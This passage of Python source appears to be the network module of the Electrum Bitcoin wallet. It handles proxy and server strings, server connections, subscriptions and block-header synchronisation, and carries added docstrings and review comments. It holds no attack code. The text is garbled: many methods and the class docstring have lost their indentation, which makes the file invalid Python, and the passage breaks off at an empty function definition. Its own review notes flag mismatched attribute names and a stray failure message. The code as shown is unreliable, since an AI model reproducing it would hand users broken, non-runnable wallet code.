    :param hostmap: host -> portmap dict; defaults to the built-in list.
    :param protocol: 's' (SSL) or 't' (TCP).
    :param exclude_set: serialized servers to skip.  Default is an
        immutable frozenset instead of the mutable ``set()`` literal the
        original used (shared-mutable-default pitfall); callers passing
        their own sets are unaffected.
    """
    if hostmap is None:
        hostmap = constants.net.DEFAULT_SERVERS
    eligible = list(set(filter_protocol(hostmap, protocol)) - exclude_set)
    return random.choice(eligible) if eligible else None
from .simple_config import SimpleConfig
proxy_modes = ['socks4', 'socks5', 'http']
def serialize_proxy(p):
    """Flatten a proxy dict into 'mode:host:port:user:password' form;
    returns None for anything that is not a dict."""
    if not isinstance(p, dict):
        return None
    fields = (p.get('mode'), p.get('host'), p.get('port'),
              p.get('user', ''), p.get('password', ''))
    return ':'.join(fields)
def deserialize_proxy(s):
    """Parse a 'mode:host:port:user:password' string into a proxy dict.

    Fields are consumed left to right and any trailing field may be
    omitted; defaults are socks5 on localhost with a mode-dependent port.
    Returns None for non-strings and for the literal string 'none'.
    """
    if not isinstance(s, str):
        return None
    if s.lower() == 'none':
        return None
    proxy = { "mode":"socks5", "host":"localhost" }
    args = s.split(':')
    n = 0
    # optional leading mode token
    if proxy_modes.count(args[n]) == 1:
        proxy["mode"] = args[n]
        n += 1
    if len(args) > n:
        proxy["host"] = args[n]
        n += 1
    if len(args) > n:
        proxy["port"] = args[n]
        n += 1
    else:
        # no port supplied: fall back to the mode's conventional default
        proxy["port"] = "8080" if proxy["mode"] == "http" else "1080"
    if len(args) > n:
        proxy["user"] = args[n]
        n += 1
    if len(args) > n:
        proxy["password"] = args[n]
    return proxy
def deserialize_server(server_str):
    """Split a 'host:port:protocol' string into its three components.

    Raises AssertionError for an invalid protocol and ValueError for a
    non-numeric port.
    """
    host, port, protocol = str(server_str).rsplit(':', 2)
    # 'protocol in "st"' would also accept '' and 'st' (substring test);
    # check membership against the two valid letters explicitly.
    assert protocol in ('s', 't')
    int(port)    # Throw if cannot be converted to int
    return host, port, protocol
def serialize_server(host, port, protocol):
    """Join host, port and protocol into the canonical 'host:port:protocol'."""
    parts = [host, port, protocol]
    return str(':'.join(parts))
class Network(util.DaemonThread):
"""The Network class manages a set of connections to remote electrum
servers, each connected socket is handled by an Interface() object.
Connections are initiated by a Connection() thread which stops once
the connection succeeds or fails.
Our external API:
- Member functions get_header(), get_interfaces(), get_local_height(),
get_parameters(), get_server_height(), get_status_value(),
is_connected(), set_parameters(), stop()
"""
    def __init__(self, config=None):
        """Initialise all connection state and kick off the network.

        :param config: a SimpleConfig, or a plain dict of options (which
            is wrapped in a SimpleConfig); None means an empty config.
        """
        if config is None:
            config = {} # Do not use mutables as default values!
        util.DaemonThread.__init__(self)
        self.config = SimpleConfig(config) if isinstance(config, dict) else config
        # 'oneserver' mode keeps only the single main connection
        self.num_server = 10 if not self.config.get('oneserver') else 0
        self.blockchains = blockchain.read_blockchains(self.config)
        self.print_error("blockchains", self.blockchains.keys())
        self.blockchain_index = config.get('blockchain_index', 0)
        if self.blockchain_index not in self.blockchains.keys():
            self.blockchain_index = 0
        # Server for addresses and transactions
        self.default_server = self.config.get('server', None)
        # Sanitize default server
        if self.default_server:
            try:
                deserialize_server(self.default_server)
            except:
                self.print_error('Warning: failed to parse server-string; falling back to random.')
                self.default_server = None
        if not self.default_server:
            self.default_server = pick_random_server()
        self.lock = threading.Lock()
        self.pending_sends = []
        self.message_id = 0
        self.debug = False
        self.irc_servers = {} # returned by interface (list from irc)
        self.recent_servers = self.read_recent_servers()
        self.banner = ''
        self.donation_address = ''
        self.relay_fee = None
        # callbacks passed with subscriptions
        self.subscriptions = defaultdict(list)
        self.sub_cache = {}
        # callbacks set by the GUI
        self.callbacks = defaultdict(list)
        dir_path = os.path.join( self.config.path, 'certs')
        if not os.path.exists(dir_path):
            os.mkdir(dir_path)
            os.chmod(dir_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
        # subscriptions and requests
        self.subscribed_addresses = set()
        # scripthash -> address reverse map (see addr_to_scripthash)
        self.h2addr = {}
        # Requests from client we've not seen a response to
        self.unanswered_requests = {}
        # retry times
        self.server_retry_time = time.time()
        self.nodes_retry_time = time.time()
        # kick off the network. interface is the main server we are currently
        # communicating with. interfaces is the set of servers we are connecting
        # to or have an ongoing connection with
        self.interface = None
        self.interfaces = {}
        self.auto_connect = self.config.get('auto_connect', True)
        self.connecting = set()
        self.requested_chunks = set()
        self.socket_queue = queue.Queue()
        self.start_network(deserialize_server(self.default_server)[2],
                           deserialize_proxy(self.config.get('proxy')))
def register_callback(self, callback, events):
with self.lock:
for event in events:
self.callbacks[event].append(callback)
def unregister_callback(self, callback):
with self.lock:
for callbacks in self.callbacks.values():
if callback in callbacks:
callbacks.remove(callback)
def trigger_callback(self, event, *args):
with self.lock:
callbacks = self.callbacks[event][:]
[callback(event, *args) for callback in callbacks]
def read_recent_servers(self):
if not self.config.path:
return []
path = os.path.join(self.config.path, "recent_servers")
try:
with open(path, "r", encoding='utf-8') as f:
data = f.read()
return json.loads(data)
except:
return []
def save_recent_servers(self):
if not self.config.path:
return
path = os.path.join(self.config.path, "recent_servers")
s = json.dumps(self.recent_servers, indent=4, sort_keys=True)
try:
with open(path, "w", encoding='utf-8') as f:
f.write(s)
except:
pass
def get_server_height(self):
return self.interface.tip if self.interface else 0
def server_is_lagging(self):
sh = self.get_server_height()
if not sh:
self.print_error('no height for main interface')
return True
lh = self.get_local_height()
result = (lh - sh) > 1
if result:
self.print_error('%s is lagging (%d vs %d)' % (self.default_server, sh, lh))
return result
    def set_status(self, status):
        """Record the new connection status and emit a 'status' callback."""
        self.connection_status = status
        self.notify('status')
    def is_connected(self):
        """True once a main interface has been selected."""
        return self.interface is not None
    def is_connecting(self):
        """True while the main server connection is being established."""
        return self.connection_status == 'connecting'
    def is_downloading(self):
        """True while the bootstrap headers file is being downloaded."""
        return self.connection_status == 'downloading'
    def is_syncing(self):
        """True while header chunks are being fetched to catch up."""
        return self.connection_status == 'syncing'
    def is_up_to_date(self):
        """True when every client request has received its response."""
        return self.unanswered_requests == {}
    def queue_request(self, method, params, interface=None):
        """Queue a JSON-RPC request on *interface* (default: main interface)
        and return the allocated message id."""
        # If you want to queue a request on any interface it must go
        # through this function so message ids are properly tracked
        if interface is None:
            interface = self.interface
        message_id = self.message_id
        self.message_id += 1
        if self.debug:
            self.print_error(interface.host, "-->", method, params, message_id)
        interface.queue_request(method, params, message_id)
        return message_id
    def send_subscriptions(self):
        """Replay state to a newly selected main interface: resend all
        unanswered client requests, re-query server metadata and fees,
        and re-subscribe every known scripthash."""
        self.print_error('sending subscriptions to', self.interface.server, len(self.unanswered_requests), len(self.subscribed_addresses))
        # the cache belongs to the previous interface's subscriptions
        self.sub_cache.clear()
        # Resend unanswered requests
        requests = self.unanswered_requests.values()
        self.unanswered_requests = {}
        if self.interface.ping_required():
            params = [ELECTRUM_VERSION, PROTOCOL_VERSION]
            self.queue_request('server.version', params, self.interface)
        for request in requests:
            message_id = self.queue_request(request[0], request[1])
            self.unanswered_requests[message_id] = request
        self.queue_request('server.banner', [])
        self.queue_request('server.donation_address', [])
        self.queue_request('server.peers.subscribe', [])
        self.request_fee_estimates()
        self.queue_request('blockchain.relayfee', [])
        for h in list(self.subscribed_addresses):
            self.queue_request('blockchain.scripthash.subscribe', [h])
def request_fee_estimates(self):
from .simple_config import FEE_ETA_TARGETS
self.config.requested_fee_estimates()
self.queue_request('mempool.get_fee_histogram', [])
for i in FEE_ETA_TARGETS:
self.queue_request('blockchain.estimatefee', [i])
def get_status_value(self, key):
if key == 'status':
value = self.connection_status
elif key == 'banner':
value = self.banner
elif key == 'fee':
value = self.config.fee_estimates
elif key == 'fee_histogram':
value = self.config.mempool_fees
elif key == 'updated':
value = (self.get_local_height(), self.get_server_height())
elif key == 'servers':
value = self.get_servers()
elif key == 'interfaces':
value = self.get_interfaces()
return value
def notify(self, key):
if key in ['status', 'updated']:
self.trigger_callback(key)
else:
self.trigger_callback(key, self.get_status_value(key))
    def get_parameters(self):
        """Return (host, port, protocol, proxy, auto_connect) for the
        current main server."""
        host, port, protocol = deserialize_server(self.default_server)
        return host, port, protocol, self.proxy, self.auto_connect
def get_donation_address(self):
if self.is_connected():
return self.donation_address
def get_interfaces(self):
'''The interfaces that are in connected state'''
return list(self.interfaces.keys())
def get_servers(self):
out = constants.net.DEFAULT_SERVERS
if self.irc_servers:
out.update(filter_version(self.irc_servers.copy()))
else:
for s in self.recent_servers:
try:
host, port, protocol = deserialize_server(s)
except:
continue
if host not in out:
out[host] = { protocol:port }
return out
def start_interface(self, server):
if (not server in self.interfaces and not server in self.connecting):
if server == self.default_server:
self.print_error("connecting to %s as new interface" % server)
self.set_status('connecting')
self.connecting.add(server)
c = Connection(server, self.socket_queue, self.config.path)
def start_random_interface(self):
exclude_set = self.disconnected_servers.union(set(self.interfaces))
server = pick_random_server(self.get_servers(), self.protocol, exclude_set)
if server:
self.start_interface(server)
def start_interfaces(self):
self.start_interface(self.default_server)
for i in range(self.num_server - 1):
self.start_random_interface()
    def set_proxy(self, proxy):
        """Install (or remove, when *proxy* is falsy) a SOCKS/HTTP proxy by
        monkey-patching the global socket module; *proxy* is a dict as
        produced by deserialize_proxy."""
        self.proxy = proxy
        # Store these somewhere so we can un-monkey-patch
        if not hasattr(socket, "_socketobject"):
            socket._socketobject = socket.socket
            socket._getaddrinfo = socket.getaddrinfo
        if proxy:
            self.print_error('setting proxy', proxy)
            # the socks module numbers proxy modes starting at 1
            proxy_mode = proxy_modes.index(proxy["mode"]) + 1
            socks.setdefaultproxy(proxy_mode,
                                  proxy["host"],
                                  int(proxy["port"]),
                                  # socks.py seems to want either None or a non-empty string
                                  username=(proxy.get("user", "") or None),
                                  password=(proxy.get("password", "") or None))
            socket.socket = socks.socksocket
            # prevent dns leaks, see http://stackoverflow.com/questions/13184205/dns-over-proxy
            socket.getaddrinfo = lambda *args: [(socket.AF_INET, socket.SOCK_STREAM, 6, '', (args[0], args[1]))]
        else:
            socket.socket = socket._socketobject
            socket.getaddrinfo = socket._getaddrinfo
    def start_network(self, protocol, proxy):
        """Bring networking up from a fully stopped state with the given
        protocol letter and proxy settings."""
        # both asserts document the 'fully stopped' precondition
        assert not self.interface and not self.interfaces
        assert not self.connecting and self.socket_queue.empty()
        self.print_error('starting network')
        self.disconnected_servers = set([])
        self.protocol = protocol
        self.set_proxy(proxy)
        self.start_interfaces()
    def stop_network(self):
        """Close every interface and reset all connection state."""
        self.print_error("stopping network")
        for interface in list(self.interfaces.values()):
            self.close_interface(interface)
        if self.interface:
            self.close_interface(self.interface)
        assert self.interface is None
        assert not self.interfaces
        self.connecting = set()
        # Get a new queue - no old pending connections thanks!
        self.socket_queue = queue.Queue()
    def set_parameters(self, host, port, protocol, proxy, auto_connect):
        """Apply new user-chosen network settings, restarting or switching
        the network only as much as necessary.  Invalid parameters, or a
        config that refuses the change, abort silently."""
        proxy_str = serialize_proxy(proxy)
        server = serialize_server(host, port, protocol)
        # sanitize parameters
        try:
            deserialize_server(serialize_server(host, port, protocol))
            if proxy:
                proxy_modes.index(proxy["mode"]) + 1
                int(proxy['port'])
        except:
            return
        self.config.set_key('auto_connect', auto_connect, False)
        self.config.set_key("proxy", proxy_str, False)
        self.config.set_key("server", server, True)
        # abort if changes were not allowed by config
        if self.config.get('server') != server or self.config.get('proxy') != proxy_str:
            return
        self.auto_connect = auto_connect
        if self.proxy != proxy or self.protocol != protocol:
            # Restart the network defaulting to the given server
            self.stop_network()
            self.default_server = server
            self.start_network(protocol, proxy)
        elif self.default_server != server:
            # same transport settings, different server: just switch
            self.switch_to_interface(server)
        else:
            self.switch_lagging_interface()
            self.notify('updated')
def switch_to_random_interface(self):
'''Switch to a random connected server other than the current one'''
servers = self.get_interfaces() # Those in connected state
if self.default_server in servers:
servers.remove(self.default_server)
if servers:
self.switch_to_interface(random.choice(servers))
def switch_lagging_interface(self):
'''If auto_connect and lagging, switch interface'''
if self.server_is_lagging() and self.auto_connect:
# switch to one that has the correct header (not height)
header = self.blockchain().read_header(self.get_local_height())
filtered = list(map(lambda x:x[0], filter(lambda x: x[1].tip_header==header, self.interfaces.items())))
if filtered:
choice = random.choice(filtered)
self.switch_to_interface(choice)
    def switch_to_interface(self, server):
        '''Switch to server as our interface. If no connection exists nor
        being opened, start a thread to connect. The actual switch will
        happen on receipt of the connection notification. Do nothing
        if server already is our interface.'''
        self.default_server = server
        if server not in self.interfaces:
            # not connected yet: clear the main interface and connect;
            # new_interface() will call back into us when the socket is up
            self.interface = None
            self.start_interface(server)
            return
        i = self.interfaces[server]
        if self.interface != i:
            self.print_error("switching to", server)
            # stop any current interface in order to terminate subscriptions
            # fixme: we don't want to close headers sub
            #self.close_interface(self.interface)
            self.interface = i
            self.send_subscriptions()
            self.set_status('connected')
            self.notify('updated')
def close_interface(self, interface):
if interface:
if interface.server in self.interfaces:
self.interfaces.pop(interface.server)
if interface.server == self.default_server:
self.interface = None
interface.close()
def add_recent_server(self, server):
# list is ordered
if server in self.recent_servers:
self.recent_servers.remove(server)
self.recent_servers.insert(0, server)
self.recent_servers = self.recent_servers[0:20]
self.save_recent_servers()
def process_response(self, interface, response, callbacks):
if self.debug:
self.print_error("<--", response)
error = response.get('error')
result = response.get('result')
method = response.get('method')
params = response.get('params')
# We handle some responses; return the rest to the client.
if method == 'server.version':
interface.server_version = result
elif method == 'blockchain.headers.subscribe':
if error is None:
self.on_notify_header(interface, result)
elif method == 'server.peers.subscribe':
if error is None:
self.irc_servers = parse_servers(result)
self.notify('servers')
elif method == 'server.banner':
if error is None:
self.banner = result
self.notify('banner')
elif method == 'server.donation_address':
if error is None:
self.donation_address = result
elif method == 'mempool.get_fee_histogram':
if error is None:
self.print_error('fee_histogram', result)
self.config.mempool_fees = result
self.notify('fee_histogram')
elif method == 'blockchain.estimatefee':
if error is None and result > 0:
i = params[0]
fee = int(result*COIN)
self.config.update_fee_estimates(i, fee)
self.print_error("fee_estimates[%d]" % i, fee)
self.notify('fee')
elif method == 'blockchain.relayfee':
if error is None:
self.relay_fee = int(result * COIN) if result is not None else None
self.print_error("relayfee", self.relay_fee)
elif method == 'blockchain.block.headers':
height, count = params
if count == 1:
self.on_get_header(interface, response, height)
elif count == CHUNK_LEN:
self.on_get_chunk(interface, response, height)
else:
self.print_error('Unknown chunk lenght: %s' % count)
for callback in callbacks:
callback(response)
def get_index(self, method, params):
""" hashable index for subscriptions and cache"""
return str(method) + (':' + str(params[0]) if params else '')
    def process_responses(self, interface):
        """Drain every response received on *interface*, normalising each
        to a canonical shape (method/params/result) and selecting the
        callbacks to notify, before handing off to process_response()."""
        responses = interface.get_responses()
        for request, response in responses:
            if request:
                method, params, message_id = request
                k = self.get_index(method, params)
                # client requests go through self.send() with a
                # callback, are only sent to the current interface,
                # and are placed in the unanswered_requests dictionary
                client_req = self.unanswered_requests.pop(message_id, None)
                if client_req:
                    assert interface == self.interface
                    callbacks = [client_req[2]]
                else:
                    # fixme: will only work for subscriptions
                    k = self.get_index(method, params)
                    callbacks = self.subscriptions.get(k, [])
                # Copy the request method and params to the response
                response['method'] = method
                response['params'] = params
                # Only once we've received a response to an addr subscription
                # add it to the list; avoids double-sends on reconnection
                if method == 'blockchain.scripthash.subscribe':
                    self.subscribed_addresses.add(params[0])
            else:
                # a server-initiated notification (no matching request)
                if not response: # Closed remotely / misbehaving
                    self.connection_down(interface.server)
                    break
                # Rewrite response shape to match subscription request response
                method = response.get('method')
                params = response.get('params')
                k = self.get_index(method, params)
                if method == 'blockchain.headers.subscribe':
                    response['result'] = params[0]
                    response['params'] = []
                elif method == 'blockchain.scripthash.subscribe':
                    response['params'] = [params[0]] # addr
                    response['result'] = params[1]
                callbacks = self.subscriptions.get(k, [])
            # update cache if it's a subscription
            if method.endswith('.subscribe'):
                self.sub_cache[k] = response
            # Response is now in canonical form
            self.process_response(interface, response, callbacks)
def addr_to_scripthash(self, addr):
h = bitcoin.address_to_scripthash(addr)
if h not in self.h2addr:
self.h2addr[h] = addr
return h
def overload_cb(self, callback):
def cb2(x):
x2 = x.copy()
p = x2.pop('params')
addr = self.h2addr[p[0]]
x2['params'] = [addr]
callback(x2)
return cb2
def subscribe_to_addresses(self, addresses, callback):
hashes = [self.addr_to_scripthash(addr) for addr in addresses]
msgs = [('blockchain.scripthash.subscribe', [x]) for x in hashes]
self.send(msgs, self.overload_cb(callback))
def request_address_history(self, address, callback):
h = self.addr_to_scripthash(address)
self.send([('blockchain.scripthash.get_history', [h])], self.overload_cb(callback))
def send(self, messages, callback):
'''Messages is a list of (method, params) tuples'''
messages = list(messages)
with self.lock:
self.pending_sends.append((messages, callback))
    def process_pending_sends(self):
        """Flush queued send() calls: register subscription callbacks
        (serving a cached response when one exists) and dispatch all
        other requests to the main interface."""
        # Requests needs connectivity. If we don't have an interface,
        # we cannot process them.
        if not self.interface:
            return
        with self.lock:
            sends = self.pending_sends
            self.pending_sends = []
        for messages, callback in sends:
            for method, params in messages:
                r = None
                if method.endswith('.subscribe'):
                    k = self.get_index(method, params)
                    # add callback to list
                    l = self.subscriptions.get(k, [])
                    if callback not in l:
                        l.append(callback)
                    self.subscriptions[k] = l
                    # check cached response for subscriptions
                    r = self.sub_cache.get(k)
                if r is not None:
                    self.print_error("cache hit", k)
                    callback(r)
                else:
                    message_id = self.queue_request(method, params)
                    self.unanswered_requests[message_id] = method, params, callback
def unsubscribe(self, callback):
'''Unsubscribe a callback to free object references to enable GC.'''
# Note: we can't unsubscribe from the server, so if we receive
# subsequent notifications process_response() will emit a harmless
# "received unexpected notification" warning
with self.lock:
for v in self.subscriptions.values():
if callback in v:
v.remove(callback)
    def connection_down(self, server):
        '''A connection to server either went down, or was never made.
        We distinguish by whether it is in self.interfaces.'''
        self.disconnected_servers.add(server)
        if server == self.default_server:
            self.set_status('disconnected')
        if server in self.interfaces:
            self.close_interface(self.interfaces[server])
            self.notify('interfaces')
        # forget any catch-up this server was performing
        for b in self.blockchains.values():
            if b.catch_up == server:
                b.catch_up = None
    def new_interface(self, server, socket):
        """Wrap a freshly connected *socket* in an Interface, register it,
        and start the headers subscription on it."""
        # todo: get tip first, then decide which checkpoint to use.
        self.add_recent_server(server)
        interface = Interface(server, socket)
        interface.blockchain = None
        interface.tip_header = None
        interface.tip = 0
        # 'default' until a header notification picks a sync mode
        interface.mode = 'default'
        interface.request = None
        self.interfaces[server] = interface
        self.queue_request('blockchain.headers.subscribe', [True], interface)
        if server == self.default_server:
            self.switch_to_interface(server)
        #self.notify('interfaces')
    def maintain_sockets(self):
        '''Socket maintenance: absorb finished connection attempts, ping or
        drop existing interfaces, top up the server pool, and keep the main
        interface alive according to the auto_connect policy.'''
        # Responses to connection attempts?
        while not self.socket_queue.empty():
            server, socket = self.socket_queue.get()
            if server in self.connecting:
                self.connecting.remove(server)
            if socket:
                self.new_interface(server, socket)
            else:
                self.connection_down(server)
        # Send pings and shut down stale interfaces
        # must use copy of values
        for interface in list(self.interfaces.values()):
            if interface.has_timed_out():
                self.connection_down(interface.server)
            elif interface.ping_required():
                params = [ELECTRUM_VERSION, PROTOCOL_VERSION]
                self.queue_request('server.version', params, interface)
        now = time.time()
        # nodes
        if len(self.interfaces) + len(self.connecting) < self.num_server:
            self.start_random_interface()
        if now - self.nodes_retry_time > NODES_RETRY_INTERVAL:
            self.print_error('network: retrying connections')
            self.disconnected_servers = set([])
            self.nodes_retry_time = now
        # main interface
        if not self.is_connected():
            if self.auto_connect:
                if not self.is_connecting():
                    self.switch_to_random_interface()
            else:
                if self.default_server in self.disconnected_servers:
                    if now - self.server_retry_time > SERVER_RETRY_INTERVAL:
                        self.disconnected_servers.remove(self.default_server)
                        self.server_retry_time = now
                else:
                    self.switch_to_interface(self.default_server)
        else:
            if self.config.is_fee_estimates_update_required():
                self.request_fee_estimates()
def request_chunk(self, interface, index):
if index in self.requested_chunks:
return
interface.print_error("requesting chunk %d" % index)
self.requested_chunks.add(index)
self.queue_request('blockchain.block.headers',
[CHUNK_LEN*index, CHUNK_LEN], interface)
    def on_get_chunk(self, interface, response, height):
        '''Handle receiving a chunk of block headers'''
        error = response.get('error')
        result = response.get('result')
        blockchain = interface.blockchain
        if result is None or error is not None:
            interface.print_error(error or 'bad response')
            return
        index = height // CHUNK_LEN
        # Ignore unsolicited chunks
        if index not in self.requested_chunks:
            interface.print_error("received chunk %d (unsolicited)" % index)
            return
        else:
            interface.print_error("received chunk %d" % index)
        self.requested_chunks.remove(index)
        hex_chunk = result.get('hex', None)
        connect = blockchain.connect_chunk(index, hex_chunk)
        if not connect:
            # chunk did not verify against our chain: drop the server
            self.connection_down(interface.server)
            return
        # If not finished, get the next chunk
        if index >= len(blockchain.checkpoints) and blockchain.height() < interface.tip:
            if not self.is_syncing():
                self.set_status('syncing')
            self.request_chunk(interface, index+1)
        else:
            if(self.is_syncing()):
                self.set_status('connected')
            interface.mode = 'default'
            interface.print_error('catch up done', blockchain.height())
            blockchain.catch_up = None
        self.notify('updated')
    def request_header(self, interface, height):
        """Request the single block header at *height* from *interface*."""
        #interface.print_error("requesting header %d" % height)
        self.queue_request('blockchain.block.headers', [height, 1], interface)
        interface.request = height
        # NOTE(review): this sets req_time, while maintain_requests() reads
        # interface.request_time — presumably the latter is maintained by
        # the Interface class itself; verify against interface.py.
        interface.req_time = time.time()
    def on_get_header(self, interface, response, height):
        '''Handle receiving a single block header.

        Drives the per-interface sync state machine (interface.mode):
        'backward' walks back from the tip until a known header is found,
        'binary' bisects between the last good and first bad height to
        locate the fork point, and 'catch_up' extends our chain header by
        header up to the server tip.
        '''
        result = response.get('result', {})
        hex_header = result.get('hex', None)
        if interface.request != height:
            interface.print_error("unsolicited header",interface.request, height)
            self.connection_down(interface.server)
            return
        if not hex_header:
            interface.print_error(response)
            self.connection_down(interface.server)
            return
        if len(hex_header) != get_header_size(height)*2:
            interface.print_error('wrong header length', interface.request)
            self.connection_down(interface.server)
            return
        header = blockchain.deserialize_header(bfh(hex_header), height)
        chain = blockchain.check_header(header)
        if interface.mode == 'backward':
            can_connect = blockchain.can_connect(header)
            if can_connect and can_connect.catch_up is None:
                # header extends a chain no one is catching up: take it over
                interface.mode = 'catch_up'
                interface.blockchain = can_connect
                interface.blockchain.save_header(header)
                next_height = height + 1
                interface.blockchain.catch_up = interface.server
            elif chain:
                # known header: bisect between good (here) and bad (above)
                interface.print_error("binary search")
                interface.mode = 'binary'
                interface.blockchain = chain
                interface.good = height
                next_height = (interface.bad + interface.good) // 2
                assert next_height >= self.max_checkpoint(), (interface.bad, interface.good)
            else:
                if height == 0:
                    self.connection_down(interface.server)
                    next_height = None
                else:
                    # still unknown: keep doubling the step backwards
                    interface.bad = height
                    interface.bad_header = header
                    delta = interface.tip - height
                    next_height = max(self.max_checkpoint(), interface.tip - 2 * delta)
        elif interface.mode == 'binary':
            if chain:
                interface.good = height
                interface.blockchain = chain
            else:
                interface.bad = height
                interface.bad_header = header
            if interface.bad != interface.good + 1:
                next_height = (interface.bad + interface.good) // 2
                assert next_height >= self.max_checkpoint()
            elif not interface.blockchain.can_connect(interface.bad_header, check_height=False):
                self.connection_down(interface.server)
                next_height = None
            else:
                # fork point located at interface.bad
                branch = self.blockchains.get(interface.bad)
                if branch is not None:
                    if branch.check_header(interface.bad_header):
                        interface.print_error('joining chain', interface.bad)
                        next_height = None
                    elif branch.parent().check_header(header):
                        interface.print_error('reorg', interface.bad, interface.tip)
                        interface.blockchain = branch.parent()
                        next_height = None
                    else:
                        interface.print_error('checkpoint conflicts with existing fork', branch.path())
                        branch.write('', 0)
                        branch.save_header(interface.bad_header)
                        interface.mode = 'catch_up'
                        interface.blockchain = branch
                        next_height = interface.bad + 1
                        interface.blockchain.catch_up = interface.server
                else:
                    # no existing fork at this height
                    bh = interface.blockchain.height()
                    next_height = None
                    if bh > interface.good:
                        if not interface.blockchain.check_header(interface.bad_header):
                            b = interface.blockchain.fork(interface.bad_header)
                            self.blockchains[interface.bad] = b
                            interface.blockchain = b
                            interface.print_error("new chain", b.checkpoint)
                            interface.mode = 'catch_up'
                            next_height = interface.bad + 1
                            interface.blockchain.catch_up = interface.server
                    else:
                        assert bh == interface.good
                        if interface.blockchain.catch_up is None and bh < interface.tip:
                            interface.print_error("catching up from %d"% (bh + 1))
                            interface.mode = 'catch_up'
                            next_height = bh + 1
                            interface.blockchain.catch_up = interface.server
                    self.notify('updated')
        elif interface.mode == 'catch_up':
            can_connect = interface.blockchain.can_connect(header)
            if can_connect:
                interface.blockchain.save_header(header)
                next_height = height + 1 if height < interface.tip else None
            else:
                # go back
                interface.print_error("cannot connect", height)
                interface.mode = 'backward'
                interface.bad = height
                interface.bad_header = header
                next_height = height - 1
            if next_height is None:
                # exit catch_up state
                interface.print_error('catch up done', interface.blockchain.height())
                interface.blockchain.catch_up = None
                self.switch_lagging_interface()
                self.notify('updated')
        else:
            raise BaseException(interface.mode)
        # If not finished, get the next header
        if next_height:
            if interface.mode == 'catch_up' and interface.tip > next_height + 50:
                # far behind: switch to bulk chunk download
                self.request_chunk(interface, next_height // CHUNK_LEN)
            else:
                self.request_header(interface, next_height)
        else:
            interface.mode = 'default'
            interface.request = None
            self.notify('updated')
        # refresh network dialog
        self.notify('interfaces')
    def maintain_requests(self):
        """Drop any interface whose outstanding header request has been
        pending for more than 20 seconds."""
        for interface in list(self.interfaces.values()):
            # NOTE(review): reads interface.request_time while
            # request_header() sets interface.req_time — presumably
            # request_time is maintained by the Interface class itself;
            # verify against interface.py.
            if interface.request and time.time() - interface.request_time > 20:
                interface.print_error("blockchain request timed out")
                self.connection_down(interface.server)
                continue
    def wait_on_sockets(self):
        """select() over all interfaces: flush pending writes and process
        whatever responses have arrived."""
        # Python docs say Windows doesn't like empty selects.
        # Sleep to prevent busy looping
        if not self.interfaces:
            time.sleep(0.1)
            return
        rin = [i for i in self.interfaces.values()]
        # only interfaces with queued requests are select()ed for writing
        win = [i for i in self.interfaces.values() if i.num_requests()]
        try:
            rout, wout, xout = select.select(rin, win, [], 0.1)
        except socket.error as e:
            # TODO: py3, get code from e
            code = None
            if code == errno.EINTR:
                return
            raise
        assert not xout
        for interface in wout:
            interface.send_requests()
        for interface in rout:
            self.process_responses(interface)
    def init_headers_file(self):
        """Ensure the headers file of the base blockchain exists, fetching
        the bootstrap copy in a background thread when it is missing."""
        b = self.blockchains[0]
        filename = b.path()
        if os.path.exists(filename):
            self.set_status("syncing")
            with b.lock:
                b.update_size(0)
            return
        def download_thread():
            # Best-effort bootstrap: on any failure an empty file is created
            # and the headers are synced from the network instead.
            try:
                # NOTE(review): 'import urllib' alone does not normally
                # expose urllib.request — presumably it is imported
                # elsewhere in the process; verify.
                import urllib, socket
                socket.setdefaulttimeout(30)
                self.print_error("downloading ", constants.net.HEADERS_URL)
                urllib.request.urlretrieve(constants.net.HEADERS_URL, filename)
            except Exception:
                import traceback
                traceback.print_exc()
                self.print_error("download failed. creating file", filename)
                open(filename, 'wb+').close()
            b = self.blockchains[0]
            with b.lock:
                b.update_size(0)
            self.set_status("syncing")
        self.set_status("downloading")
        t = threading.Thread(target = download_thread)
        t.daemon = True
        t.start()
    def run(self):
        """Main daemon loop: wait for the headers bootstrap, then service
        sockets, background jobs and pending sends until stopped."""
        self.init_headers_file()
        while self.is_running() and self.is_downloading():
            time.sleep(1)
        # NOTE(review): this logs on every startup, even when the download
        # succeeded or was skipped — looks like a stray copy of the message
        # in init_headers_file's failure path; confirm intent.
        self.print_error("download failed. creating file")
        while self.is_running():
            self.maintain_sockets()
            self.wait_on_sockets()
            self.maintain_requests()
            self.run_jobs() # Synchronizer and Verifier
            self.process_pending_sends()
        self.stop_network()
        self.on_stop()
    def on_notify_header(self, interface, header):
        """Handle a new chain-tip header announced by *interface*.

        Validates the announcement, records the interface's new tip, and
        then either attaches the interface to a known chain, extends a
        chain with the header, or switches the interface into
        backward/catch-up mode to resolve an unknown header.
        """
        height = header.get('height')
        hex_header = header.get('hex')
        if not height or not hex_header:
            return
        # Two hex characters per byte; anything else is malformed.
        if len(hex_header) != get_header_size(height)*2:
            interface.print_error('wrong header length', interface.request)
            self.connection_down(interface.server)
            return
        header = blockchain.deserialize_header(bfh(hex_header), height)
        # Servers must not announce tips below our hard-coded checkpoints.
        if height < self.max_checkpoint():
            self.connection_down(interface.server)
            return
        interface.tip_header = header
        interface.tip = height
        if interface.mode != 'default':
            # Interface is already resolving a fork; leave it alone.
            return
        self.print_error(header)
        b = blockchain.check_header(header)
        if b:
            # Header already present in a known chain.
            interface.blockchain = b
            self.switch_lagging_interface()
            self.notify('updated')
            self.notify('interfaces')
            return
        b = blockchain.can_connect(header)
        if b:
            # Header extends a known chain; persist it.
            interface.blockchain = b
            b.save_header(header)
            self.switch_lagging_interface()
            self.notify('updated')
            self.notify('interfaces')
            return
        tip = max([x.height() for x in self.blockchains.values()])
        if tip >=0:
            # Unknown header on a non-empty chain: binary-search backwards
            # for the fork point.
            interface.mode = 'backward'
            interface.bad = height
            interface.bad_header = header
            self.request_header(interface, min(tip +1, height - 1))
        else:
            # No headers at all yet: let one interface catch up from genesis.
            chain = self.blockchains[0]
            if chain.catch_up is None:
                chain.catch_up = interface
                interface.mode = 'catch_up'
                interface.blockchain = chain
                self.print_error("switching to catchup mode", tip, self.blockchains)
                self.request_header(interface, 0)
            else:
                self.print_error("chain already catching up with", chain.catch_up.server)
def blockchain(self):
if self.interface and self.interface.blockchain is not None:
self.blockchain_index = self.interface.blockchain.checkpoint
return self.blockchains[self.blockchain_index]
def get_blockchains(self):
out = {}
for k, b in self.blockchains.items():
r = list(filter(lambda i: i.blockchain==b, list(self.interfaces.values())))
if r:
out[k] = r
return out
def follow_chain(self, index):
